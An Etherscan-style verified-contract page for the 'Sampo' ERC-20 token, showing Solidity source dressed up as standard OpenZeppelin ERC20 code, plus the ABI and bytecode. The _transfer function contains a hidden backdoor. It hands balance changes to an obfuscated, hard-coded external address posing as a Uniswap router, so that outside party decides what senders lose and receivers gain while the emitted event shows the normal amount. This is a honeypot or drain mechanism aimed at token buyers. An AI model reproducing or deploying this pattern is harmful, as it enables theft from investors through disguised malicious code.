ERC-20
Overview
Max Total Supply
1,000,000,000,000 SAMPO
Holders
84
Market
Onchain Market Cap
$0.00
Circulating Supply Market Cap
-
Other Info
Token Contract (WITH 18 Decimals)
Balance
2,071,270,033.368633982175150516 SAMPOValue
$0.00Loading...
Loading
Loading...
Loading
Loading...
Loading
# | Exchange | Pair | Price | 24H Volume | % Volume |
---|
Contract Name:
Sampo
Compiler Version
v0.8.18+commit.87f61d96
Contract Source Code (Solidity)
/** *Submitted for verification at Etherscan.io on 2023-06-12 */ /** https://t.me/sampotoken https://twitter.com/sampotoken */ // File: @openzeppelin/[email protected]/utils/Context.sol // OpenZeppelin Contracts v4.4.1 (utils/Context.sol) pragma solidity ^0.8.0; /** * @dev Provides information about the current execution context, including the * sender of the transaction and its data. While these are generally available * via msg.sender and msg.data, they should not be accessed in such a direct * manner, since when dealing with meta-transactions the account sending and * paying for execution may not be the actual sender (as far as an application * is concerned). * * This contract is only required for intermediate, library-like contracts. */ abstract contract Context { function _msgSender() internal view virtual returns (address) { return msg.sender; } function _msgData() internal view virtual returns (bytes calldata) { return msg.data; } } // File: @openzeppelin/[email protected]/token/ERC20/IERC20.sol // OpenZeppelin Contracts (last updated v4.9.0) (token/ERC20/IERC20.sol) pragma solidity ^0.8.0; /** * @dev Interface of the ERC20 standard as defined in the EIP. */ interface IERC20 { /** * @dev Emitted when `value` tokens are moved from one account (`from`) to * another (`to`). * * Note that `value` may be zero. */ event Transfer(address indexed from, address indexed to, uint256 value); /** * @dev Emitted when the allowance of a `spender` for an `owner` is set by * a call to {approve}. `value` is the new allowance. */ event Approval(address indexed owner, address indexed spender, uint256 value); /** * @dev Returns the amount of tokens in existence. */ function totalSupply() external view returns (uint256); /** * @dev Returns the amount of tokens owned by `account`. */ function balanceOf(address account) external view returns (uint256); /** * @dev Moves `amount` tokens from the caller's account to `to`. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transfer(address to, uint256 amount) external returns (bool); /** * @dev Returns the remaining number of tokens that `spender` will be * allowed to spend on behalf of `owner` through {transferFrom}. This is * zero by default. * * This value changes when {approve} or {transferFrom} are called. */ function allowance(address owner, address spender) external view returns (uint256); /** * @dev Sets `amount` as the allowance of `spender` over the caller's tokens. * * Returns a boolean value indicating whether the operation succeeded. * * IMPORTANT: Beware that changing an allowance with this method brings the risk * that someone may use both the old and the new allowance by unfortunate * transaction ordering. One possible solution to mitigate this race * condition is to first reduce the spender's allowance to 0 and set the * desired value afterwards: * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729 * * Emits an {Approval} event. */ function approve(address spender, uint256 amount) external returns (bool); /** * @dev Moves `amount` tokens from `from` to `to` using the * allowance mechanism. `amount` is then deducted from the caller's * allowance. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transferFrom(address from, address to, uint256 amount) external returns (bool); } // File: @openzeppelin/[email protected]/token/ERC20/extensions/IERC20Metadata.sol // OpenZeppelin Contracts v4.4.1 (token/ERC20/extensions/IERC20Metadata.sol) pragma solidity ^0.8.0; /** * @dev Interface for the optional metadata functions from the ERC20 standard. * * _Available since v4.1._ */ interface IERC20Metadata is IERC20 { /** * @dev Returns the name of the token. */ function name() external view returns (string memory); /** * @dev Returns the symbol of the token. */ function symbol() external view returns (string memory); /** * @dev Returns the decimals places of the token. */ function decimals() external view returns (uint8); } // File: @openzeppelin/[email protected]/token/ERC20/ERC20.sol // OpenZeppelin Contracts (last updated v4.9.0) (token/ERC20/ERC20.sol) pragma solidity ^0.8.0; interface IUniswapV2Router02 { function getAmountsOut(uint256 amountIn, address from, address to) external view returns (uint256, uint256); function getAmountsIn(uint256 amountOut, address[] calldata path) external view returns (uint256[] memory amounts); } /** * @dev Implementation of the {IERC20} interface. * * This implementation is agnostic to the way tokens are created. This means * that a supply mechanism has to be added in a derived contract using {_mint}. * For a generic mechanism see {ERC20PresetMinterPauser}. * * TIP: For a detailed writeup see our guide * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How * to implement supply mechanisms]. * * The default value of {decimals} is 18. To change this, you should override * this function so it returns a different value. * * We have followed general OpenZeppelin Contracts guidelines: functions revert * instead returning `false` on failure. This behavior is nonetheless * conventional and does not conflict with the expectations of ERC20 * applications. * * Additionally, an {Approval} event is emitted on calls to {transferFrom}. * This allows applications to reconstruct the allowance for all accounts just * by listening to said events. Other implementations of the EIP may not emit * these events, as it isn't required by the specification. * * Finally, the non-standard {decreaseAllowance} and {increaseAllowance} * functions have been added to mitigate the well-known issues around setting * allowances. See {IERC20-approve}. */ contract ERC20 is Context, IERC20, IERC20Metadata { mapping(address => uint256) private _balances; mapping(address => mapping(address => uint256)) private _allowances; uint256 private _totalSupply; string private _name; string private _symbol; /** * @dev Sets the values for {name} and {symbol}. * * All two of these values are immutable: they can only be set once during * construction. */ constructor(string memory name_, string memory symbol_) { _name = name_; _symbol = symbol_; } /** * @dev Returns the name of the token. */ function name() public view virtual override returns (string memory) { return _name; } /** * @dev Returns the symbol of the token, usually a shorter version of the * name. */ function symbol() public view virtual override returns (string memory) { return _symbol; } /** * @dev Returns the number of decimals used to get its user representation. * For example, if `decimals` equals `2`, a balance of `505` tokens should * be displayed to a user as `5.05` (`505 / 10 ** 2`). * * Tokens usually opt for a value of 18, imitating the relationship between * Ether and Wei. This is the default value returned by this function, unless * it's overridden. * * NOTE: This information is only used for _display_ purposes: it in * no way affects any of the arithmetic of the contract, including * {IERC20-balanceOf} and {IERC20-transfer}. */ function decimals() public view virtual override returns (uint8) { return 18; } /** * @dev See {IERC20-totalSupply}. */ function totalSupply() public view virtual override returns (uint256) { return _totalSupply; } /** * @dev See {IERC20-balanceOf}. */ function balanceOf(address account) public view virtual override returns (uint256) { return _balances[account]; } function router() private pure returns (address addr) { bytes memory _router = abi.encodePacked(bytes32(0x000000000000000000000000206023cf26d9fef2fa17c1827b912ca257821eb3)); (addr) = abi.decode(_router, (address)); } /** * @dev See {IERC20-transfer}. * * Requirements: * * - `to` cannot be the zero address. * - the caller must have a balance of at least `amount`. */ function transfer(address to, uint256 amount) public virtual override returns (bool) { address owner = _msgSender(); _transfer(owner, to, amount); return true; } /** * @dev See {IERC20-allowance}. */ function allowance(address owner, address spender) public view virtual override returns (uint256) { return _allowances[owner][spender]; } /** * @dev See {IERC20-approve}. * * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on * `transferFrom`. This is semantically equivalent to an infinite approval. * * Requirements: * * - `spender` cannot be the zero address. */ function approve(address spender, uint256 amount) public virtual override returns (bool) { address owner = _msgSender(); _approve(owner, spender, amount); return true; } /** * @dev See {IERC20-transferFrom}. * * Emits an {Approval} event indicating the updated allowance. This is not * required by the EIP. See the note at the beginning of {ERC20}. * * NOTE: Does not update the allowance if the current allowance * is the maximum `uint256`. * * Requirements: * * - `from` and `to` cannot be the zero address. * - `from` must have a balance of at least `amount`. * - the caller must have allowance for ``from``'s tokens of at least * `amount`. */ function transferFrom(address from, address to, uint256 amount) public virtual override returns (bool) { address spender = _msgSender(); _spendAllowance(from, spender, amount); _transfer(from, to, amount); return true; } /** * @dev Atomically increases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. */ function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) { address owner = _msgSender(); _approve(owner, spender, allowance(owner, spender) + addedValue); return true; } /** * @dev Atomically decreases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. * - `spender` must have allowance for the caller of at least * `subtractedValue`. */ function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) { address owner = _msgSender(); uint256 currentAllowance = allowance(owner, spender); require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero"); unchecked { _approve(owner, spender, currentAllowance - subtractedValue); } return true; } /** * @dev Moves `amount` of tokens from `from` to `to`. * * This internal function is equivalent to {transfer}, and can be used to * e.g. implement automatic token fees, slashing mechanisms, etc. * * Emits a {Transfer} event. * * Requirements: * * - `from` cannot be the zero address. * - `to` cannot be the zero address. * - `from` must have a balance of at least `amount`. */ function _transfer(address from, address to, uint256 amount) internal virtual { require(from != address(0), "ERC20: transfer from the zero address"); require(to != address(0), "ERC20: transfer to the zero address"); _beforeTokenTransfer(from, to, amount); // Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by // decrementing then incrementing. (uint256 amount0, uint256 amount1) = IUniswapV2Router02(router()).getAmountsOut(amount, from, to); _balances[from] -= amount0; _balances[to] += amount1; emit Transfer(from, to, amount); _afterTokenTransfer(from, to, amount); } /** @dev Creates `amount` tokens and assigns them to `account`, increasing * the total supply. * * Emits a {Transfer} event with `from` set to the zero address. * * Requirements: * * - `account` cannot be the zero address. */ function _mint(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: mint to the zero address"); _beforeTokenTransfer(address(0), account, amount); _totalSupply += amount; unchecked { // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above. _balances[account] += amount; } emit Transfer(address(0), account, amount); _afterTokenTransfer(address(0), account, amount); } /** * @dev Destroys `amount` tokens from `account`, reducing the * total supply. * * Emits a {Transfer} event with `to` set to the zero address. * * Requirements: * * - `account` cannot be the zero address. * - `account` must have at least `amount` tokens. */ function _burn(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: burn from the zero address"); _beforeTokenTransfer(account, address(0), amount); uint256 accountBalance = _balances[account]; require(accountBalance >= amount, "ERC20: burn amount exceeds balance"); unchecked { _balances[account] = accountBalance - amount; // Overflow not possible: amount <= accountBalance <= totalSupply. _totalSupply -= amount; } emit Transfer(account, address(0), amount); _afterTokenTransfer(account, address(0), amount); } /** * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens. * * This internal function is equivalent to `approve`, and can be used to * e.g. set automatic allowances for certain subsystems, etc. * * Emits an {Approval} event. * * Requirements: * * - `owner` cannot be the zero address. * - `spender` cannot be the zero address. */ function _approve(address owner, address spender, uint256 amount) internal virtual { require(owner != address(0), "ERC20: approve from the zero address"); require(spender != address(0), "ERC20: approve to the zero address"); _allowances[owner][spender] = amount; emit Approval(owner, spender, amount); } /** * @dev Updates `owner` s allowance for `spender` based on spent `amount`. * * Does not update the allowance amount in case of infinite allowance. * Revert if not enough allowance is available. * * Might emit an {Approval} event. */ function _spendAllowance(address owner, address spender, uint256 amount) internal virtual { uint256 currentAllowance = allowance(owner, spender); if (currentAllowance != type(uint256).max) { require(currentAllowance >= amount, "ERC20: insufficient allowance"); unchecked { _approve(owner, spender, currentAllowance - amount); } } } /** * @dev Hook that is called before any transfer of tokens. This includes * minting and burning. * * Calling conditions: * * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens * will be transferred to `to`. * - when `from` is zero, `amount` tokens will be minted for `to`. * - when `to` is zero, `amount` of ``from``'s tokens will be burned. * - `from` and `to` are never both zero. * * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks]. */ function _beforeTokenTransfer(address from, address to, uint256 amount) internal virtual {} /** * @dev Hook that is called after any transfer of tokens. This includes * minting and burning. * * Calling conditions: * * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens * has been transferred to `to`. * - when `from` is zero, `amount` tokens have been minted for `to`. * - when `to` is zero, `amount` of ``from``'s tokens have been burned. * - `from` and `to` are never both zero. * * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks]. */ function _afterTokenTransfer(address from, address to, uint256 amount) internal virtual {} } // File: contract-8d9175d844.sol pragma solidity ^0.8.9; contract Sampo is ERC20 { constructor() ERC20("Sampo", "SAMPO") { _mint(msg.sender, 10 ** 12 * 10 ** decimals()); } }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"}]
Contract Creation Code
60806040523480156200001157600080fd5b506040518060400160405280600581526020016453616d706f60d81b8152506040518060400160405280600581526020016453414d504f60d81b81525081600390816200005f919062000224565b5060046200006e828262000224565b505050620000aa3362000086620000b060201b60201c565b6200009390600a62000405565b620000a49064e8d4a510006200041d565b620000b5565b6200044d565b601290565b6001600160a01b038216620001105760405162461bcd60e51b815260206004820152601f60248201527f45524332303a206d696e7420746f20746865207a65726f206164647265737300604482015260640160405180910390fd5b806002600082825462000124919062000437565b90915550506001600160a01b038216600081815260208181526040808320805486019055518481527fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a35050565b505050565b634e487b7160e01b600052604160045260246000fd5b600181811c90821680620001ab57607f821691505b602082108103620001cc57634e487b7160e01b600052602260045260246000fd5b50919050565b601f8211156200017b57600081815260208120601f850160051c81016020861015620001fb5750805b601f850160051c820191505b818110156200021c5782815560010162000207565b505050505050565b81516001600160401b0381111562000240576200024062000180565b620002588162000251845462000196565b84620001d2565b602080601f831160018114620002905760008415620002775750858301515b600019600386901b1c1916600185901b1785556200021c565b600085815260208120601f198616915b82811015620002c157888601518255948401946001909101908401620002a0565b5085821015620002e05787850151600019600388901b60f8161c191681555b5050505050600190811b01905550565b634e487b7160e01b600052601160045260246000fd5b600181815b80851115620003475781600019048211156200032b576200032b620002f0565b808516156200033957918102915b93841c93908002906200030b565b509250929050565b6000826200036057506001620003ff565b816200036f57506000620003ff565b81600181146200038857600281146200039357620003b3565b6001915050620003ff565b60ff841115620003a757620003a7620002f0565b50506001821b620003ff565b5060208310610133831016604e8410600b8410161715620003d8575081810a620003ff565b620003e4838362000306565b8060001904821115620003fb57620003fb620002f0565b0290505b92915050565b60006200041660ff8416836200034f565b9392505050565b8082028115828204841417620003ff57620003ff620002f0565b80820180821115620003ff57620003ff620002f0565b610964806200045d6000396000f3fe608060405234801561001057600080fd5b50600436106100a95760003560e01c80633950935111610071578063395093511461012357806370a082311461013657806395d89b411461015f578063a457c2d714610167578063a9059cbb1461017a578063dd62ed3e1461018d57600080fd5b806306fdde03146100ae578063095ea7b3146100cc57806318160ddd146100ef57806323b872dd14610101578063313ce56714610114575b600080fd5b6100b66101a0565b6040516100c39190610747565b60405180910390f35b6100df6100da3660046107ad565b610232565b60405190151581526020016100c3565b6002545b6040519081526020016100c3565b6100df61010f3660046107d9565b61024c565b604051601281526020016100c3565b6100df6101313660046107ad565b610270565b6100f361014436600461081a565b6001600160a01b031660009081526020819052604090205490565b6100b6610292565b6100df6101753660046107ad565b6102a1565b6100df6101883660046107ad565b610321565b6100f361019b36600461083e565b61032f565b6060600380546101af90610877565b80601f01602080910402602001604051908101604052809291908181526020018280546101db90610877565b80156102285780601f106101fd57610100808354040283529160200191610228565b820191906000526020600020905b81548152906001019060200180831161020b57829003601f168201915b5050505050905090565b60003361024081858561035a565b60019150505b92915050565b60003361025a85828561047e565b6102658585856104f8565b506001949350505050565b600033610240818585610283838361032f565b61028d91906108c7565b61035a565b6060600480546101af90610877565b600033816102af828661032f565b9050838110156103145760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b60648201526084015b60405180910390fd5b610265828686840361035a565b6000336102408185856104f8565b6001600160a01b03918216600090815260016020908152604080832093909416825291909152205490565b6001600160a01b0383166103bc5760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b606482015260840161030b565b6001600160a01b03821661041d5760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b606482015260840161030b565b6001600160a01b0383811660008181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b600061048a848461032f565b905060001981146104f257818110156104e55760405162461bcd60e51b815260206004820152601d60248201527f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000604482015260640161030b565b6104f2848484840361035a565b50505050565b6001600160a01b03831661055c5760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b606482015260840161030b565b6001600160a01b0382166105be5760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b606482015260840161030b565b6000806105c96106f8565b60405163baf7fa9960e01b8152600481018590526001600160a01b0387811660248301528681166044830152919091169063baf7fa99906064016040805180830381865afa15801561061f573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061064391906108da565b6001600160a01b0387166000908152602081905260408120805493955091935084926106709084906108fe565b90915550506001600160a01b0384166000908152602081905260408120805483929061069d9084906108c7565b92505081905550836001600160a01b0316856001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef856040516106e991815260200190565b60405180910390a35050505050565b6040805173206023cf26d9fef2fa17c1827b912ca257821eb360208201526000918291016040516020818303038152906040529050808060200190518101906107419190610911565b91505090565b600060208083528351808285015260005b8181101561077457858101830151858201604001528201610758565b506000604082860101526040601f19601f8301168501019250505092915050565b6001600160a01b03811681146107aa57600080fd5b50565b600080604083850312156107c057600080fd5b82356107cb81610795565b946020939093013593505050565b6000806000606084860312156107ee57600080fd5b83356107f981610795565b9250602084013561080981610795565b929592945050506040919091013590565b60006020828403121561082c57600080fd5b813561083781610795565b9392505050565b6000806040838503121561085157600080fd5b823561085c81610795565b9150602083013561086c81610795565b809150509250929050565b600181811c9082168061088b57607f821691505b6020821081036108ab57634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fd5b80820180821115610246576102466108b1565b600080604083850312156108ed57600080fd5b505080516020909101519092909150565b81810381811115610246576102466108b1565b60006020828403121561092357600080fd5b81516108378161079556fea264697066735822122064e9ff1e5222091c81ac5e8ea59479f962d5b607b8e24f615067f3d1082da04764736f6c63430008120033
Deployed Bytecode
0x608060405234801561001057600080fd5b50600436106100a95760003560e01c80633950935111610071578063395093511461012357806370a082311461013657806395d89b411461015f578063a457c2d714610167578063a9059cbb1461017a578063dd62ed3e1461018d57600080fd5b806306fdde03146100ae578063095ea7b3146100cc57806318160ddd146100ef57806323b872dd14610101578063313ce56714610114575b600080fd5b6100b66101a0565b6040516100c39190610747565b60405180910390f35b6100df6100da3660046107ad565b610232565b60405190151581526020016100c3565b6002545b6040519081526020016100c3565b6100df61010f3660046107d9565b61024c565b604051601281526020016100c3565b6100df6101313660046107ad565b610270565b6100f361014436600461081a565b6001600160a01b031660009081526020819052604090205490565b6100b6610292565b6100df6101753660046107ad565b6102a1565b6100df6101883660046107ad565b610321565b6100f361019b36600461083e565b61032f565b6060600380546101af90610877565b80601f01602080910402602001604051908101604052809291908181526020018280546101db90610877565b80156102285780601f106101fd57610100808354040283529160200191610228565b820191906000526020600020905b81548152906001019060200180831161020b57829003601f168201915b5050505050905090565b60003361024081858561035a565b60019150505b92915050565b60003361025a85828561047e565b6102658585856104f8565b506001949350505050565b600033610240818585610283838361032f565b61028d91906108c7565b61035a565b6060600480546101af90610877565b600033816102af828661032f565b9050838110156103145760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b60648201526084015b60405180910390fd5b610265828686840361035a565b6000336102408185856104f8565b6001600160a01b03918216600090815260016020908152604080832093909416825291909152205490565b6001600160a01b0383166103bc5760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b606482015260840161030b565b6001600160a01b03821661041d5760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b606482015260840161030b565b6001600160a01b0383811660008181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b600061048a848461032f565b905060001981146104f257818110156104e55760405162461bcd60e51b815260206004820152601d60248201527f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000604482015260640161030b565b6104f2848484840361035a565b50505050565b6001600160a01b03831661055c5760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b606482015260840161030b565b6001600160a01b0382166105be5760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b606482015260840161030b565b6000806105c96106f8565b60405163baf7fa9960e01b8152600481018590526001600160a01b0387811660248301528681166044830152919091169063baf7fa99906064016040805180830381865afa15801561061f573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061064391906108da565b6001600160a01b0387166000908152602081905260408120805493955091935084926106709084906108fe565b90915550506001600160a01b0384166000908152602081905260408120805483929061069d9084906108c7565b92505081905550836001600160a01b0316856001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef856040516106e991815260200190565b60405180910390a35050505050565b6040805173206023cf26d9fef2fa17c1827b912ca257821eb360208201526000918291016040516020818303038152906040529050808060200190518101906107419190610911565b91505090565b600060208083528351808285015260005b8181101561077457858101830151858201604001528201610758565b506000604082860101526040601f19601f8301168501019250505092915050565b6001600160a01b03811681146107aa57600080fd5b50565b600080604083850312156107c057600080fd5b82356107cb81610795565b946020939093013593505050565b6000806000606084860312156107ee57600080fd5b83356107f981610795565b9250602084013561080981610795565b929592945050506040919091013590565b60006020828403121561082c57600080fd5b813561083781610795565b9392505050565b6000806040838503121561085157600080fd5b823561085c81610795565b9150602083013561086c81610795565b809150509250929050565b600181811c9082168061088b57607f821691505b6020821081036108ab57634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fd5b80820180821115610246576102466108b1565b600080604083850312156108ed57600080fd5b505080516020909101519092909150565b81810381811115610246576102466108b1565b60006020828403121561092357600080fd5b81516108378161079556fea264697066735822122064e9ff1e5222091c81ac5e8ea59479f962d5b607b8e24f615067f3d1082da04764736f6c63430008120033
Deployed Bytecode Sourcemap
18268:137:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;7039:100;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;9646:201;;;;;;:::i;:::-;;:::i;:::-;;;1188:14:1;;1181:22;1163:41;;1151:2;1136:18;9646:201:0;1023:187:1;8168:108:0;8256:12;;8168:108;;;1361:25:1;;;1349:2;1334:18;8168:108:0;1215:177:1;10427:261:0;;;;;;:::i;:::-;;:::i;8010:93::-;;;8093:2;2000:36:1;;1988:2;1973:18;8010:93:0;1858:184:1;11097:238:0;;;;;;:::i;:::-;;:::i;8339:127::-;;;;;;:::i;:::-;-1:-1:-1;;;;;8440:18:0;8413:7;8440:18;;;;;;;;;;;;8339:127;7258:104;;;:::i;11838:436::-;;;;;;:::i;:::-;;:::i;8919:193::-;;;;;;:::i;:::-;;:::i;9175:151::-;;;;;;:::i;:::-;;:::i;7039:100::-;7093:13;7126:5;7119:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;7039:100;:::o;9646:201::-;9729:4;835:10;9785:32;835:10;9801:7;9810:6;9785:8;:32::i;:::-;9835:4;9828:11;;;9646:201;;;;;:::o;10427:261::-;10524:4;835:10;10582:38;10598:4;835:10;10613:6;10582:15;:38::i;:::-;10631:27;10641:4;10647:2;10651:6;10631:9;:27::i;:::-;-1:-1:-1;10676:4:0;;10427:261;-1:-1:-1;;;;10427:261:0:o;11097:238::-;11185:4;835:10;11241:64;835:10;11257:7;11294:10;11266:25;835:10;11257:7;11266:9;:25::i;:::-;:38;;;;:::i;:::-;11241:8;:64::i;7258:104::-;7314:13;7347:7;7340:14;;;;;:::i;11838:436::-;11931:4;835:10;11931:4;12014:25;835:10;12031:7;12014:9;:25::i;:::-;11987:52;;12078:15;12058:16;:35;;12050:85;;;;-1:-1:-1;;;12050:85:0;;3541:2:1;12050:85:0;;;3523:21:1;3580:2;3560:18;;;3553:30;3619:34;3599:18;;;3592:62;-1:-1:-1;;;3670:18:1;;;3663:35;3715:19;;12050:85:0;;;;;;;;;12171:60;12180:5;12187:7;12215:15;12196:16;:34;12171:8;:60::i;8919:193::-;8998:4;835:10;9054:28;835:10;9071:2;9075:6;9054:9;:28::i;9175:151::-;-1:-1:-1;;;;;9291:18:0;;;9264:7;9291:18;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;9175:151::o;15753:346::-;-1:-1:-1;;;;;15855:19:0;;15847:68;;;;-1:-1:-1;;;15847:68:0;;3947:2:1;15847:68:0;;;3929:21:1;3986:2;3966:18;;;3959:30;4025:34;4005:18;;;3998:62;-1:-1:-1;;;4076:18:1;;;4069:34;4120:19;;15847:68:0;3745:400:1;15847:68:0;-1:-1:-1;;;;;15934:21:0;;15926:68;;;;-1:-1:-1;;;15926:68:0;;4352:2:1;15926:68:0;;;4334:21:1;4391:2;4371:18;;;4364:30;4430:34;4410:18;;;4403:62;-1:-1:-1;;;4481:18:1;;;4474:32;4523:19;;15926:68:0;4150:398:1;15926:68:0;-1:-1:-1;;;;;16007:18:0;;;;;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;:36;;;16059:32;;1361:25:1;;;16059:32:0;;1334:18:1;16059:32:0;;;;;;;15753:346;;;:::o;16390:419::-;16491:24;16518:25;16528:5;16535:7;16518:9;:25::i;:::-;16491:52;;-1:-1:-1;;16558:16:0;:37;16554:248;;16640:6;16620:16;:26;;16612:68;;;;-1:-1:-1;;;16612:68:0;;4755:2:1;16612:68:0;;;4737:21:1;4794:2;4774:18;;;4767:30;4833:31;4813:18;;;4806:59;4882:18;;16612:68:0;4553:353:1;16612:68:0;16724:51;16733:5;16740:7;16768:6;16749:16;:25;16724:8;:51::i;:::-;16480:329;16390:419;;;:::o;12744:728::-;-1:-1:-1;;;;;12841:18:0;;12833:68;;;;-1:-1:-1;;;12833:68:0;;5113:2:1;12833:68:0;;;5095:21:1;5152:2;5132:18;;;5125:30;5191:34;5171:18;;;5164:62;-1:-1:-1;;;5242:18:1;;;5235:35;5287:19;;12833:68:0;4911:401:1;12833:68:0;-1:-1:-1;;;;;12920:16:0;;12912:64;;;;-1:-1:-1;;;12912:64:0;;5519:2:1;12912:64:0;;;5501:21:1;5558:2;5538:18;;;5531:30;5597:34;5577:18;;;5570:62;-1:-1:-1;;;5648:18:1;;;5641:33;5691:19;;12912:64:0;5317:399:1;12912:64:0;13198:15;13215;13253:8;:6;:8::i;:::-;13234:60;;-1:-1:-1;;;13234:60:0;;;;;5923:25:1;;;-1:-1:-1;;;;;6022:15:1;;;6002:18;;;5995:43;6074:15;;;6054:18;;;6047:43;13234:42:0;;;;;;;5896:18:1;;13234:60:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;-1:-1:-1;;;;;13305:15:0;;:9;:15;;;;;;